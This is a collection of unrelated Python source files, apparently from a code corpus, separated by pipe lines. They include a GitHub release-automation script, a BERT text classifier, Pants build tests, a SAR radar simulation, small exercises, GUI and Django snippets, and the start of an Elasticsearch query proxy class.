regex = r"^__version__ ?=.*(?P<version>{}).*".format(VERSION_RE)
match = re.match(regex, line)
if match:
update_count += 1
old_version = match.group('version').strip()
updated_line = re.sub(regex, "__version__ = '{}'".format(new_version), line)
elif filename == "setup.py":
regex = r"\s*version=.*(?P<version>{}).*".format(VERSION_RE)
match = re.match(regex, line)
if match:
update_count += 1
old_version = match.group('version').strip()
updated_line = re.sub(regex, "version='{}',".format(new_version), line)
file_lines.append("{}\n".format(updated_line))
if update_count == 1:
# Replace contents of file with updated version
with open(version_filepath, "w") as f:
for line in file_lines:
f.write(line)
return old_version
elif update_count > 1:
raise UpdateVersionException("Expected only one version for {file} but found {count}".format(
file=filename,
count=update_count,
))
# Unable to find old version for this file, but maybe there's another one
return None
def update_version(new_version, *, working_dir):
"""Update the version from the project and return the old one, or raise an exception if none is found"""
print("Updating version...")
exclude_dirs = ('.cache', '.git', '.settings', )
version_files = ('settings.py', '__init__.py', 'setup.py')
found_version_filename = None
old_version = None
for version_filename in version_files:
for root, dirs, filenames in os.walk(working_dir, topdown=True):
dirs[:] = [d for d in dirs if d not in exclude_dirs]
if version_filename in filenames:
version = update_version_in_file(root, version_filename, new_version)
if version:
if not found_version_filename:
found_version_filename = version_filename
old_version = version
else:
raise UpdateVersionException(
"Found at least two files with updatable versions: {} and {}".format(
found_version_filename,
version_filename,
)
)
if not found_version_filename:
raise UpdateVersionException("Unable to find previous version number")
return old_version
async def any_new_commits(version, *, base_branch, root):
"""
Return true if there are any new commits since a release
Args:
version (str): A version string
base_branch (str): The branch to compare against
root (str): The project root directory
Returns:
bool: True if there are new commits
"""
output = await check_output(["git", "rev-list", "--count", f"v{version}..{base_branch}", "--"], cwd=root)
return int(output) != 0
async def create_release_notes(old_version, with_checkboxes, *, base_branch, root):
"""
Returns the release note text for the commits made for this version
Args:
old_version (str): The starting version of the range of commits
with_checkboxes (bool): If true, create the release notes with spaces for checkboxes
base_branch (str): The base branch to compare against
root (str): The project root directory
Returns:
str: The release notes
"""
if with_checkboxes:
filename = "release_notes.ejs"
else:
filename = "release_notes_rst.ejs"
if not await any_new_commits(old_version, base_branch=base_branch, root=root):
return "No new commits"
output = await check_output([
GIT_RELEASE_NOTES_PATH,
f"v{old_version}..{base_branch}",
os.path.join(SCRIPT_DIR, "util", filename),
], cwd=root)
return "{}\n".format(output.decode().strip())
async def verify_new_commits(old_version, *, base_branch, root):
"""Check if there are new commits to release"""
if not await any_new_commits(old_version, base_branch=base_branch, root=root):
raise ReleaseException("No new commits to put in release")
async def update_release_notes(old_version, new_version, *, base_branch, root):
"""Updates RELEASE.rst and commits it"""
release_notes = await create_release_notes(old_version, with_checkboxes=False, base_branch=base_branch, root=root)
release_filename = os.path.join(root, "RELEASE.rst")
try:
with open(release_filename) as f:
existing_note_lines = f.readlines()
except FileNotFoundError:
existing_note_lines = []
with open(release_filename, "w") as f:
f.write("Release Notes\n")
f.write("=============\n")
f.write("\n")
version_line = "Version {}".format(new_version)
f.write("{}\n".format(version_line))
f.write("{}\n".format("-" * len(version_line)))
f.write("\n")
f.write(release_notes)
f.write("\n")
# skip first four lines which contain the header we are replacing
for old_line in existing_note_lines[3:]:
f.write(old_line)
await check_call(["git", "add", release_filename], cwd=root)
await check_call(["git", "commit", "-q", "--all", "--message", f"Release {new_version}"], cwd=root)
async def build_release(*, root):
"""Deploy the release candidate"""
print("Building release...")
await check_call(["git", "push", "--force", "-q", "origin", "release-candidate:release-candidate"], cwd=root)
async def generate_release_pr(*, github_access_token, repo_url, old_version, new_version, base_branch, root):
"""
Make a release pull request for the deployed release-candidate branch
Args:
github_access_token (str): The github access token
repo_url (str): URL for the repo
old_version (str): The previous release version
new_version (str): The version of the new release
base_branch (str): The base branch to compare against
root (str): The project root directory
"""
print("Generating PR...")
await create_pr(
github_access_token=github_access_token,
repo_url=repo_url,
title="Release {version}".format(version=new_version),
body=await create_release_notes(old_version, with_checkboxes=True, base_branch=base_branch, root=root),
head="release-candidate",
base="release",
)
async def release(github_access_token, repo_url, new_version, branch=None, commit_hash=None):
"""
Run a release
Args:
github_access_token (str): The github access token
repo_url (str): URL for a repo
new_version (str): The version of the new release
branch (str): The branch to initialize the release from
commit_hash (str): Commit hash to cherry pick in case of a hot fix
"""
await validate_dependencies()
async with init_working_dir(github_access_token, repo_url, branch=branch) as working_dir:
await check_call(["git", "checkout", "-qb", "release-candidate"], cwd=working_dir)
if commit_hash:
try:
await check_call(["git", "cherry-pick", commit_hash], cwd=working_dir)
except CalledProcessError:
raise ReleaseException(f"Cherry pick failed for the given hash {commit_hash}")
old_version = update_version(new_version, working_dir=working_dir)
if parse_version(old_version) >= parse_version(new_version):
raise ReleaseException("old version is {old} but the new version {new} is not newer".format(
old=old_version,
new=new_version,
))
base_branch = "release-candidate" if commit_hash else "master"
await verify_new_commits(old_version, base_branch=base_branch, root=working_dir)
await update_release_notes(old_version, new_version, base_branch=base_branch, root=working_dir)
await build_release(root=working_dir)
await generate_release_pr(
github_access_token=github_access_token,
repo_url=repo_url,
old_version=old_version,
new_version=new_version,
base_branch=base_branch,
root=working_dir,
)
print(f"version {old_version} has been updated to {new_version}")
print("Go tell engineers to check their work. PR is on the repo.")
print("After they are done, run the finish_release.py script.")
def main():
"""
Create a new release
"""
try:
github_access_token = os.environ['GITHUB_ACCESS_TOKEN']
except KeyError:
raise Exception("Missing GITHUB_ACCESS_TOKEN")
parser = argparse.ArgumentParser()
parser.add_argument("repo_url")
parser.add_argument("version")
args = parser.parse_args()
asyncio.run(release(
github_access_token=github_access_token,
repo_url=args.repo_url,
new_version=args.version,
))
if __name__ == "__main__":
main()
|
#Spritesheet loading and parsing
import pygame
from Constants import *
class Spritesheet:
def __init__(self,filename):
self.spritesheet = pygame.image.load(filename).convert()
def get_image(self,x,y,width,height):
#grab an image out of a larger spritesheet
image = pygame.Surface((width,height))
image.blit(self.spritesheet, (0,0), (x,y,width,height))
return image
|
import numpy as np
import time
import datetime
import random
import pandas as pd
import torch
from torch.utils.data import DataLoader, SequentialSampler, RandomSampler
from transformers import BertForSequenceClassification, get_linear_schedule_with_warmup, AdamW
from fnp.utils.data.csv_tensor_dataset import CSVTensorDataset
from sklearn.metrics import accuracy_score, precision_recall_fscore_support
class CSVClassifier:
def __init__(self, config):
self.config = config
self.train_epoch = 0
self.num_labels = 0
def train(self):
train_data_loader = self.load_data(self.config.train_file, RandomSampler)
validation_data_loader = self.load_data(self.config.validation_file)
self.train_on_dataset(train_data_loader, validation_data_loader)
def validate(self):
validation_data_loader = self.load_data(self.config.validation_file)
model = torch.load(self.config.model_input)
self.validate_on_dataset(model, validation_data_loader)
def load_model(self, num_labels=7):
model = BertForSequenceClassification.from_pretrained(
self.config.model_name, # Use the 12-layer BERT model, with an uncased vocab.
num_labels=num_labels, # The number of output labels--2 for binary classification.
# You can increase this for multi-class tasks.
output_attentions=False, # Whether the model returns attentions weights.
output_hidden_states=False, # Whether the model returns all hidden-states.
)
# Tell pytorch to run this model on the GPU.
model.to(self.config.device)
return model
def format_time(argsself, elapsed):
'''
Takes a time in seconds and returns a string hh:mm:ss
'''
# Round to the nearest second.
elapsed_rounded = int(round((elapsed)))
# Format as hh:mm:ss
return str(datetime.timedelta(seconds=elapsed_rounded))
def train_on_dataset( self, train_dataloader, validation_dataloader):
model = self.load_model(num_labels=self.num_labels)
# Note: AdamW is a class from the huggingface library (as opposed to pytorch)
# I believe the 'W' stands for 'Weight Decay fix"
optimizer = AdamW(model.parameters(),
lr=2e-5, # args.learning_rate - default is 5e-5, our notebook had 2e-5
eps=1e-8 # args.adam_epsilon - default is 1e-8.
)
# Total number of training steps is number of batches * number of epochs.
total_steps = len(train_dataloader) * self.config.epochs
# Create the learning rate scheduler.
scheduler = get_linear_schedule_with_warmup(optimizer,
num_warmup_steps=0, # Default value in run_glue.py
num_training_steps=total_steps)
# This training code is based on the `run_glue.py` script here:
# https://github.com/huggingface/transformers/blob/5bfcd0485ece086ebcbed2d008813037968a9e58/examples/run_glue.py#L128
# Set the seed value all over the place to make this reproducible.
random.seed(self.config.seed)
np.random.seed(self.config.seed)
torch.manual_seed(self.config.seed)
torch.cuda.manual_seed_all(self.config.seed)
# Store the average loss after each epoch so we can plot them.
loss_values = []
# For each epoch...
for epoch_i in range(0, self.config.epochs):
self.train_epoch = epoch_i
# ========================================
# Training
# ========================================
# Perform one full pass over the training set.
print("")
print('======== Epoch {:} / {:} ========'.format(epoch_i + 1, self.config.epochs))
print('Training...')
# Measure how long the training epoch takes.
t0 = time.time()
# Reset the total loss for this epoch.
total_loss = 0
# Put the model into training mode. Don't be mislead--the call to
# `train` just changes the *mode*, it doesn't *perform* the training.
# `dropout` and `batchnorm` layers behave differently during training
# vs. test (source: https://stackoverflow.com/questions/51433378/what-does-model-train-do-in-pytorch)
model.train()
# For each batch of training data...
for step, batch in enumerate(train_dataloader):
# Progress update every 40 batches.
if step % 40 == 0 and not step == 0:
# Calculate elapsed time in minutes.
elapsed = self.format_time(time.time() - t0)
# Report progress.
print(' Batch {:>5,} of {:>5,}. Elapsed: {:}.'.format(step, len(train_dataloader), elapsed))
# Unpack this training batch from our dataloader.
#
# As we unpack the batch, we'll also copy each tensor to the GPU using the
# `to` method.
#
# `batch` contains three pytorch tensors:
# [0]: input ids
# [1]: attention masks
# [2]: labels
b_input_ids = batch[0].to(self.config.device)
b_input_mask = batch[1].to(self.config.device)
b_labels = batch[2].to(self.config.device)
# Always clear any previously calculated gradients before performing a
# backward pass. PyTorch doesn't do this automatically because
# accumulating the gradients is "convenient while training RNNs".
# (source: https://stackoverflow.com/questions/48001598/why-do-we-need-to-call-zero-grad-in-pytorch)
model.zero_grad()
# Perform a forward pass (evaluate the model on this training batch).
# This will return the loss (rather than the model output) because we
# have provided the `labels`.
# The documentation for this `model` function is here:
# https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification
outputs = model(b_input_ids,
token_type_ids=None,
attention_mask=b_input_mask,
labels=b_labels)
# The call to `model` always returns a tuple, so we need to pull the
# loss value out of the tuple.
loss = outputs[0]
# Accumulate the training loss over all of the batches so that we can
# calculate the average loss at the end. `loss` is a Tensor containing a
# single value; the `.item()` function just returns the Python value
# from the tensor.
total_loss += loss.item()
# Perform a backward pass to calculate the gradients.
loss.backward()
# Clip the norm of the gradients to 1.0.
# This is to help prevent the "exploding gradients" problem.
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
# Update parameters and take a step using the computed gradient.
# The optimizer dictates the "update rule"--how the parameters are
# modified based on their gradients, the learning rate, etc.
optimizer.step()
# Update the learning rate.
scheduler.step()
# Calculate the average loss over the training data.
avg_train_loss = total_loss / len(train_dataloader)
# Store the loss value for plotting the learning curve.
loss_values.append(avg_train_loss)
print("")
print(" Average training loss: {0:.4f}".format(avg_train_loss))
print(" Training epcoh took: {:}".format(self.format_time(time.time() - t0)))
self.validate_on_dataset(model, validation_dataloader)
if (self.config.model_out is not None) and ((epoch_i + 1) % 4 == 0):
torch.save(model, self.config.model_out + "_" + str(epoch_i + 1) + ".pt")
print("")
print("Training complete!")
def validate_on_dataset(self, model, validation_dataloader):
# ========================================
# Validation
# ========================================
# After the completion of each training epoch, measure our performance on
# our validation set.
print("")
print("Running Validation...")
t0 = time.time()
# Put the model in evaluation mode--the dropout layers behave differently
# during evaluation.
model.eval()
# Gold labels per batch
labels_per_batch = []
# Input sequence per batch
input_ids_per_batch = []
# Prediction weights per batch
outputs_per_batch = []
# Evaluate data for one epoch
for batch in validation_dataloader:
# Add batch to GPU
batch = tuple(t.to(self.config.device) for t in batch)
# Unpack the inputs from our dataloader
b_input_ids, b_input_mask, b_labels = batch
# Telling the model not to compute or store gradients, saving memory and
# speeding up validation
with torch.no_grad():
# Forward pass, calculate logit predictions.
# This will return the logits rather than the loss because we have
# not provided labels.
# token_type_ids is the same as the "segment ids", which
# differentiates sentence 1 and 2 in 2-sentence tasks.
# The documentation for this `model` function is here:
# https://huggingface.co/transformers/v2.2.0/model_doc/bert.html#transformers.BertForSequenceClassification
outputs = model(b_input_ids,
token_type_ids=None,
attention_mask=b_input_mask)
labels_per_batch.append(b_labels)
input_ids_per_batch.append(b_input_ids)
outputs_per_batch.append(outputs)
input_ids_list = self.convert_batch_of_input_ids_to_list(input_ids_per_batch)
label_list = self.convert_batch_of_labels_to_list(labels_per_batch)
logit_list = self.convert_batch_of_outputs_to_list_of_logits(outputs_per_batch)
self.evaluate(input_ids_list, label_list, logit_list)
self.write_results(input_ids_list, label_list, logit_list)
def convert_batch_of_labels_to_list(self, labels_per_batch):
label_list = []
for b_labels in labels_per_batch:
label_list += list(b_labels.to('cpu').numpy())
return label_list
def convert_batch_of_input_ids_to_list(self, input_ids_per_batch):
input_id_list = []
for b_input_ids in input_ids_per_batch:
input_id_list += list(b_input_ids.to('cpu').numpy())
return input_id_list
def convert_batch_of_outputs_to_list_of_logits(self, output):
logit_list = []
for b_output in output:
logit_list += list(b_output[0].detach().cpu().numpy())
return logit_list
def evaluate(self, input_id_list, label_list, logit_list):
preds = np.argmax(logit_list, axis=1).flatten()
self.evaluate_head(label_list, preds)
def evaluate_head(self, y_true, y_pred):
"""
Evaluate Precision, Recall, F1 scores between y_true and y_pred
If output_file is provided, scores are saved in this file otherwise printed to std output.
:param y_true: true labels
:param y_pred: predicted labels
:return: list of scores (F1, Recall, Precision, ExactMatch)
"""
assert len(y_true) == len(y_pred)
print()
print("Accuracy: " + str(accuracy_score(y_true, y_pred)))
precision, recall, f1, _ = precision_recall_fscore_support(y_true, y_pred, labels=[0, 1],
average='weighted')
scores = [
"F1: %f\n" % f1,
"Recall: %f\n" % recall,
"Precision: %f\n" % precision,
"ExactMatch: %f\n" % -1.0
]
for s in scores:
print(s, end='')
def load_data(self, file, sampler=SequentialSampler):
data = CSVTensorDataset(file, max_len=self.config.max_len, tokenizer_name=self.config.model_name)
sampler = sampler(data)
data_loader = DataLoader(data, sampler=sampler, batch_size=self.config.batch_size, num_workers=0)
if self.num_labels == 0:
self.num_labels = data.num_labels
return data_loader
def write_results(self, input_id_list, label_list, logit_list):
self.write_results_on_head(input_id_list, label_list, logit_list)
def write_results_on_head(self, input_id_list, label_list, logit_list, file_name_params=""):
if self.config.out_file is not None:
preds = np.argmax(logit_list, axis=1).flatten()
pd.DataFrame(preds, columns=["pred"]).to_csv(self.config.out_file + str(self.train_epoch) + "." + file_name_params + ".csv", index=False)
|
r, c = map(int, input().split())
cake_row = [input() for i in range(r)]
free_row = len([1 for i in cake_row if 'S' not in i])
free_col = len([1 for i in zip(*cake_row) if 'S' not in i])
print(free_col * (r-free_row) + free_row*c)
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os
import pytest
from pants.backend.helm.goals import package
from pants.backend.helm.goals.package import BuiltHelmArtifact, HelmPackageFieldSet
from pants.backend.helm.subsystems.helm import HelmSubsystem
from pants.backend.helm.target_types import HelmChartTarget
from pants.backend.helm.target_types import rules as target_types_rules
from pants.backend.helm.testutil import (
HELM_TEMPLATE_HELPERS_FILE,
HELM_VALUES_FILE,
K8S_SERVICE_TEMPLATE,
gen_chart_file,
)
from pants.backend.helm.util_rules import chart, sources, tool
from pants.build_graph.address import Address
from pants.core.goals.package import BuiltPackage
from pants.core.util_rules import config_files, external_tool, source_files
from pants.engine.rules import QueryRule
from pants.source.source_root import rules as source_root_rules
from pants.testutil.rule_runner import RuleRunner
@pytest.fixture
def rule_runner() -> RuleRunner:
return RuleRunner(
target_types=[HelmChartTarget],
rules=[
*config_files.rules(),
*external_tool.rules(),
*tool.rules(),
*chart.rules(),
*package.rules(),
*source_files.rules(),
*source_root_rules(),
*sources.rules(),
*target_types_rules(),
*HelmSubsystem.rules(),
QueryRule(BuiltPackage, [HelmPackageFieldSet]),
],
)
def _assert_build_package(rule_runner: RuleRunner, *, chart_name: str, chart_version: str) -> None:
target = rule_runner.get_target(Address(f"src/{chart_name}", target_name=chart_name))
field_set = HelmPackageFieldSet.create(target)
dest_dir = field_set.output_path.value_or_default(file_ending=None)
result = rule_runner.request(BuiltPackage, [field_set])
assert len(result.artifacts) == 1
assert isinstance(result.artifacts[0], BuiltHelmArtifact)
assert result.artifacts[0].relpath == os.path.join(
dest_dir, f"{chart_name}-{chart_version}.tgz"
)
assert result.artifacts[0].info
def test_helm_package(rule_runner: RuleRunner) -> None:
chart_name = "foo"
chart_version = "0.1.0"
rule_runner.write_files(
{
f"src/{chart_name}/BUILD": f"helm_chart(name='{chart_name}')",
f"src/{chart_name}/Chart.yaml": gen_chart_file(chart_name, version=chart_version),
f"src/{chart_name}/values.yaml": HELM_VALUES_FILE,
f"src/{chart_name}/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
f"src/{chart_name}/templates/service.yaml": K8S_SERVICE_TEMPLATE,
}
)
_assert_build_package(rule_runner, chart_name=chart_name, chart_version=chart_version)
def test_helm_package_with_custom_output_path(rule_runner: RuleRunner) -> None:
chart_name = "bar"
chart_version = "0.2.0"
output_path = "charts"
rule_runner.write_files(
{
f"src/{chart_name}/BUILD": f"""helm_chart(name="{chart_name}", output_path="{output_path}")""",
f"src/{chart_name}/Chart.yaml": gen_chart_file(chart_name, version=chart_version),
f"src/{chart_name}/values.yaml": HELM_VALUES_FILE,
f"src/{chart_name}/templates/_helpers.tpl": HELM_TEMPLATE_HELPERS_FILE,
f"src/{chart_name}/templates/service.yaml": K8S_SERVICE_TEMPLATE,
}
)
_assert_build_package(rule_runner, chart_name=chart_name, chart_version=chart_version)
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from pants.backend.python.target_types import (
PythonSourcesGeneratorTarget,
PythonSourceTarget,
PythonTestsGeneratorTarget,
PythonTestTarget,
PythonTestUtilsGeneratorTarget,
)
from pants.engine.target import BoolField
class SkipFlake8Field(BoolField):
alias = "skip_flake8"
default = False
help = "If true, don't run Flake8 on this target's code."
def rules():
return [
PythonSourcesGeneratorTarget.register_plugin_field(SkipFlake8Field),
PythonSourceTarget.register_plugin_field(SkipFlake8Field),
PythonTestsGeneratorTarget.register_plugin_field(SkipFlake8Field),
PythonTestTarget.register_plugin_field(SkipFlake8Field),
PythonTestUtilsGeneratorTarget.register_plugin_field(SkipFlake8Field),
]
|
# File: shopping.py
# Author: Joel Okpara
# Date: 3/7/2016
# Section: 04
# E-mail: joelo1@umbc.edu
# Description: allows the user to create a shooping list and calculate
# how much the shopping trip cost.
def main():
shopping = ""
shoppingList = []
while shopping != "done":
shopping = input("Add an item to your list(type 'done' when finished): ")
shoppingList.append(shopping)
shoppingList.remove("done")
if shopping == "done":
print("Your final shopping list: ",shoppingList)
print()
total = 0
while len(shoppingList)> 0:
itemPrice = float(input("How much did "+shoppingList[0]+" cost? "))
total = total + itemPrice
shoppingList.remove(shoppingList[0])
print()
print("Your shopping trip cost $"+str(total))
print("Shopping list at end of trip: ",shoppingList)
main()
|
# -*- coding: utf-8 -*-
class Solution:
def secondHighest(self, s: str) -> int:
digits = {int(c) for c in s if c.isdigit()}
if len(digits) < 2:
return -1
*_, result, _ = sorted(list(digits))
return result
if __name__ == "__main__":
solution = Solution()
assert 2 == solution.secondHighest("dfa12321afd")
assert -1 == solution.secondHighest("abc1111")
assert 0 == solution.secondHighest("ck077")
|
import sys
import os
f = open("C:/Users/user/Documents/python/import.txt","r")
sys.stdin = f
# -*- coding: utf-8 -*-
s = str(input())
one = 0
zero = 0
for i in s:
if i == "0":
zero += 1
else:
one += 1
if zero > one:
print(one * 2)
else:
print(zero * 2)
|
#!/usr/bin/python
import time
import numpy as np
start_time=time.time()
debug=True
_code_git_version="fe3342f0a6244db71e585d67179e4c782a7c67e7"
_code_repository="https://github.com/plops/cl-py-generator/tree/master/example/106_sar/source/"
_code_generation_time="22:23:37 of Thursday, 2023-04-20 (GMT+1)"
# speed of light (m/s)
c=(3.0e+8)
# center frequency (Hz)
fc=(5.5e+9)
# wavelength (m)
wavelength=((c)/(fc))
# platform_speed (m/s)
platform_speed=100
# platform altitude (m)
altitude=5000
# simulation duration (s)
duration=10
# sample_rate (Hz)
sample_rate=1000
# bandwidth (Hz)
bw=(5.0e+7)
# pulse duration (s)
T_p=(1.00e-5)
# chirp rate (Hz/s)
K=((bw)/(T_p))
# scattering targets on the ground plane (m)
scatter_points=np.array([[3000, 5000], [5000, 8000], [8000, 15000]])
# time array (s)
tt=np.arange(0, duration, ((1)/(sample_rate)))
# position array (m)
platform_positions=((platform_speed)*(tt))
# slant ranges for each scatter point (m)
slant_ranges=np.sqrt(((((altitude)**(2)))+(((((scatter_points[:,0])-(platform_positions[:,np.newaxis])))**(2)))))
# round-trip time delay (s)
time_delays=((2)*(((slant_ranges)/(c))))
# time axis for pulse (s)
t_chirp=np.arange(0, T_p, ((1)/(sample_rate)))
# chirped radar pulse amplitude (amplitude)
transmitted_signal=np.exp(((1j)*(np.pi)*(K)*(((t_chirp)**(2)))))
# radial speed difference between platform and target (m/s)
v_radial=((((-platform_speed)*(((scatter_points[:,0])-(platform_positions[:,np.newaxis])))))/(slant_ranges))
# doppler_shifts (Hz)
doppler_shifts=((2)*(((v_radial)/(wavelength))))
# received_signal (amplitude)
received_signal=np.zeros((len(tt),len(transmitted_signal),), dtype=complex)
for scatter_idx in range(scatter_points.shape[0]):
delay_samples=np.round(((time_delays[:,scatter_idx])*(sample_rate))).astype(int)
for idx, delay in enumerate(delay_samples):
if ( ((((0)<=(delay))) and (((delay)<(len(transmitted_signal))))) ):
received_signal[idx] += ((np.exp(((1j)*(2)*(np.pi)*(doppler_shifts[idx,scatter_idx])*(t_chirp))))*(transmitted_signal[delay:]))
# noise_level (amplitude)
noise_level=(1.00e-5)
# received_signal (-)
received_signal=((received_signal)+(((noise_level)*(((np.random.randn(*received_signal.shape))+(((1j)*(np.random.randn(*received_signal.shape)))))))))
|
import resources as res
from datetime import datetime
import time
urls = res.read_file('categories')
while True:
if int(datetime.now().strftime('%M')) % 10 == 0:
file = open('data/' + datetime.now().strftime('%Y-%m-%d_%H-%M'), 'w+')
for url in urls:
data = res.get_data(url)
headers = res.get_headers(data)
row_data = res.get_rows(data, len(headers))
for row in row_data:
new_item = ""
for item in row:
new_item += item + ';'
file.write(new_item[:-1] + '\n')
file.close()
print("Writing done: " + datetime.now().strftime('%Y-%m-%d_%H-%M'))
time.sleep(61)
res.close_browser()
|
# _ * _ coding: utf-8 _ * _ #
# @Time :2020/7/23 17:22
# @FileName :card.py
# @Author :LiuYang
from PySide2 import QtGui
from PySide2 import QtWidgets
from PySide2 import QtCore
from Libs import package
class Card(QtWidgets.QFrame):
double_click = QtCore.Signal(int)
left_clicked = QtCore.Signal(dict)
def __init__(self, project_data):
super(Card, self).__init__()
self.setObjectName("Card")
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.FramelessWindowHint)
self.setFixedSize(300, 200)
self.project_object = project_data
cover, title = self.__format_project_data(self.project_object)
# image = package.get('icon/know.jpg')
self._preview_image = QtGui.QPixmap(cover).scaled(300, 150)
# self._preview_image = QtGui.QPixmap(image).scaled(300, 150)
self.MainLayout = QtWidgets.QVBoxLayout(self)
self.MainLayout.setContentsMargins(0, 0, 0, 0)
self.imageLabel = QtWidgets.QLabel()
self.imageLabel.setPixmap(self._preview_image)
self.informationLayout = QtWidgets.QHBoxLayout()
self.informationLayout.setContentsMargins(0, 0, 0, 0)
# title = u"测试任务"
self.nameLabel = QtWidgets.QLabel(title)
self.setup_ui()
self.set_style_sheet()
@staticmethod
def __format_project_data(project_data):
title = project_data.name
if len(title) > 8:
title = "{}...".format(title[:5].encode("utf-8"))
return QtGui.QPixmap(package.get('icon/know.jpg')).scaled(350, 200), title
def setup_ui(self):
self.MainLayout.addWidget(self.imageLabel)
self.MainLayout.addLayout(self.informationLayout)
self.informationLayout.addWidget(self.nameLabel)
def set_style_sheet(self):
self.setStyleSheet("background-color: #323232")
self.nameLabel.setStyleSheet("font: 14pt '微软雅黑';color:#cccccc")
def leaveEvent(self, event):
self.setStyleSheet("background-color: #323232")
def enterEvent(self, event):
self.setStyleSheet("background-color: #2db7f5")
def mousePressEvent(self, event):
if event.buttons() == QtCore.Qt.LeftButton:
self.left_clicked.emit({"name": self.project_object.name, "id":self.project_object.id})
def mouseDoubleClickEvent(self, event):
if event.buttons() == QtCore.Qt.LeftButton:
self.double_click.emit(self.project_object.id)
if __name__ == "__main__":
app = QtWidgets.QApplication([])
Alert_Example = Card("1")
Alert_Example.show()
app.exec_()
|
import argparse
from convertor.encode_convertor import encode as encod
from convertor.decode_convertor import Decoder
import re
import sys
import string
#KEY_FILE = 'key'
from pathlib import Path
import os
import convertor
KEY_FILE = Path(os.path.dirname(convertor.__file__)) / 'key'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('source_text',
type=str,
help='Returns encoded or decode text')
return parser.parse_args()
def decode():
text=str(sys.argv[1])
code=Decoder(KEY_FILE)
text=code.convert_text(text)
return text
raise NotImplementedError('Not implemented [4]')
def encode():
text=str(sys.argv[1])
code = encod(KEY_FILE)
text=code.convert_text(text)
return text
raise NotImplementedError('Not implemented [5]')
def prepare_text_source(text: str):
return re.sub(string.punctuation, '', text.lower())
|
#encoding=utf8
import os,sys
BASE_DIR='/home/wdm/Desktop/monitor_linux_server/'
sys.path.append(BASE_DIR)
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name="home"),
path('listing/', views.listing, name="listing"),
path('listing/<int:immo_id>/', views.listing_detail, name="detail"),
]
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import threading
import time
import re
from datetime import datetime
from pytz import timezone, UTC
import requests
import pysolr
from shapely import wkt
from elasticsearch import Elasticsearch
ELASTICSEARCH_CON_LOCK = threading.Lock()
thread_local = threading.local()
EPOCH = timezone('UTC').localize(datetime(1970, 1, 1))
ELASTICSEARCH_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
ISO_8601 = '%Y-%m-%dT%H:%M:%S%z'
class ElasticsearchProxy(object):
def __init__(self, config):
self.elasticsearchHosts = config.get("elasticsearch", "host").split(',')
self.elasticsearchIndex = config.get("elasticsearch", "index")
self.elasticsearchUsername = config.get("elasticsearch", "username")
self.elasticsearchPassword = config.get("elasticsearch", "password")
self.logger = logging.getLogger(__name__)
with ELASTICSEARCH_CON_LOCK:
elasticsearchcon = getattr(thread_local, 'elasticsearchcon', None)
if elasticsearchcon is None:
elasticsearchcon = Elasticsearch(hosts=self.elasticsearchHosts, http_auth=(self.elasticsearchUsername, self.elasticsearchPassword))
thread_local.elasticsearchcon = elasticsearchcon
self.elasticsearchcon = elasticsearchcon
def find_tile_by_id(self, tile_id):
params = {
"size": 1,
"query": {
"term": {
"id": {
"value": tile_id
}
}
}
}
results, _, hits = self.do_query(*(None, None, None, True, None), **params)
assert hits == 1, f"Found {hits} results, expected exactly 1"
return [results[0]["_source"]]
def find_tiles_by_id(self, tile_ids, ds=None, **kwargs):
params = {
"query": {
"bool": {
"filter": [],
"should": [],
"minimum_should_match": 1
}
}
}
for tile_id in tile_ids:
params['query']['bool']['should'].append({"term": {"id": {"value": tile_id}}})
if ds is not None:
params['query']['bool']['filter'].append({"term": {"dataset_s": {"value": ds}}})
self._merge_kwargs(params, **kwargs)
results = self.do_query_all(*(None, None, None, False, None), **params)
assert len(results) == len(tile_ids), "Found %s results, expected exactly %s" % (len(results), len(tile_ids))
return results
def find_min_date_from_tiles(self, tile_ids, ds=None, **kwargs):
params = {
"size": 0,
"query": {
"bool": {
"filter": [],
"should": []
}
},
"aggs": {
"min_date_agg": {
"min": {
"field": "tile_min_time_dt"
}
}
}
}
for tile_id in tile_ids:
params['query']['bool']['should'].append({"term": {"id": {"value": tile_id}}})
if ds is not None:
params['query']['bool']['filter'].append({"term": {"dataset_s": {"value": ds}}})
aggregations = self.do_aggregation(*(None, None, None, True, None), **params)
return self.convert_iso_to_datetime(aggregations['min_date_agg']["value_as_string"])
def find_max_date_from_tiles(self, tile_ids, ds=None, **kwargs):
params = {
"size": 0,
"query": {
"bool": {
"filter": [],
"should": []
}
},
"aggs": {
"max_date_agg": {
"max": {
"field": "tile_max_time_dt"
}
}
}
}
for tile_id in tile_ids:
params['query']['bool']['should'].append({"term": {"id": {"value": tile_id}}})
if ds is not None:
params['query']['bool']['filter'].append({"term": {"dataset_s": {"value": ds}}})
aggregations = self.do_aggregation(*(None, None, None, True, None), **params)
return self.convert_iso_to_datetime(aggregations['max_date_agg']["value_as_string"])
def find_min_max_date_from_granule(self, ds, granule_name, **kwargs):
params = {
"query": {
"bool": {
"filter": [
{
"term": {
"dataset_s": {
"value": ds
}
}
},
{
"term": {
"granule_s": {
"value": granule_name
}
}
}
]
}
},
"aggs": {
"min_date_agg": {
"max": {
"field": "tile_min_time_dt"
}
},
"max_date_agg": {
"max": {
"field": "tile_max_time_dt"
}
}
}
}
self._merge_kwargs(params, **kwargs)
aggregations = self.do_aggregation(*(None, None, None, False, None), **params)
start_time = self.convert_iso_to_datetime(aggregations['min_date_agg']["value_as_string"])
end_time = self.convert_iso_to_datetime(aggregations['max_date_agg']["value_as_string"])
return start_time, end_time
def get_data_series_list(self):
